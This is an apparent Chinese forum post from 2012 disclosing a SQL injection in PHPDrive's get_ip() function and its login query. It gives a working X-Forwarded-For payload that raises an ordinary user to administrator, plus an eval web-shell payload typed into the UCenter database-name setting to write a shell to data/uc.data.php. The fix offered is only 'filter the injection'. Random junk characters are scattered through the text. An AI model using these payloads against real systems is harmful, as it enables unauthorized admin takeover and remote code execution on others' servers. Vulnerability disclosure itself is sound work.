PHPDrive 是一套运行于 PHP 环境的文件管理系统,可以应用于网盘、企业文件管理、学校、团队管理、软件站、文件CMS等
2 G% j, A9 `. W
. D9 \/ A( I6 m+ X; N8 o+ vincludes/user.lib.php H0 @' s2 k" [
行87
7 H( r. g2 T0 B ]+ L function get_ip() {0 Q4 z9 z' `% k+ M* z) `2 \: x6 C
if(isset($_SERVER["HTTP_X_FORWARDED_FOR"])&&$_SERVER["HTTP_X_FORWARDED_FOR"]) $ip = $_SERVER["HTTP_X_FORWARDED_FOR"];.
1 Q: a. ?7 `$ J' o在用户注册与登录 处module/disk/account.lead.php
: I; {3 Z# F+ k6 e' ?% u9 L198行
) u0 Y) Z* Z- h. L //更新本次登录IP和时间: [* A7 b$ S2 m) @ s
$db->Query(‘UPDATE `’.$db->TPre.’user` SET `before_last_date` = ‘.$UserArr['last_date'].’,`last_date` = ‘.$NowUnixTime.’,`before_last_ip` = “‘.$UserArr['last_ip'].’”,`last_ip` = “‘.get_ip().’” WHERE `uid` = ‘.$UserArr['uid'].’;');//get_ip()入库注入产生) h4 ?5 T3 n, X# Y
由于本套程序user与manager是存在于同一个表下的,只是用group字段来区分两者,group=1为管理员,2则为普通用户。所以可以利用以上注入,将普通用户的group值改为1,即可提升权限" m& }7 b$ Z C( N3 E9 a. ~ c
实现方法:使用firefox的一款插件x-forwarded-for Header 1.0,将你的IP地址改为123″,`group`=”1然后登陆,这时候你就是管理员了.1 s4 n9 ]/ b8 K2 ?1 l
后台getshell:7 L m7 r7 d. J G- i7 J
在UCenter设置处,将UC数据库登录名填写为
( f$ q2 o7 {8 z1 X% ?- W1 t5 @
$ \/ r4 b! q B" K5 g! Aroot’);eval($_POST[DisKill]);?>/*
$ r x, F+ p1 G9 N% z% o: z: |5 M可以得到一个shell,位置在 data/uc.data.php/ X9 \ W3 N) l# ~: z
7 V4 e( @: b% ~' |' I
修复:过滤注入
& M9 E: V- E! Q6 R# T0 h/ R* i
+ M i- F6 c" A, E |
发表于 2012-12-31 09:18:34
收藏
支持
反对